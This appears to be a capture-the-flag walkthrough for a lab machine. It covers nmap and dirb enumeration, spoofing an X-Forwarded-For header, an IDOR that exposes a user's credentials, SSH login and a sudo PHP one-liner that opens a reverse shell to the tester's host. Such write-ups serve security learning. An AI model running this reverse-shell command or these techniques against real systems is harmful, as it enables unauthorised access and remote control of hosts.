We start by scanning the host with nmap
Nmap –A –T4 –p- 192.168.1.3 –vv
Running dirb gave us 3 directories one of them is robot.txt with a new directory with txt file /heyhoo.txt.
The x-forward is in the header of the page which we can add it by using burpsuite
And then hit forward and a new page of the company will show up for us.
We can fill the information required in the registration page
After registering yourself take a look at the address bar you will find you got an id number , mine is 12 I changed it to 1 and I got a new name which is already registered I kept changing it till 5 and I got Alice username and password where you can view it in the page source.
Username is alice password is 4lic3
Now we can access her account by using her credentials in ssh service .
Right!! Now all we need it to run a php script to connect us using nc on our machine and it’s easy.
sudo /usr/bin/php -r ‘$sock=fsockopen(“192.168.1.11”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’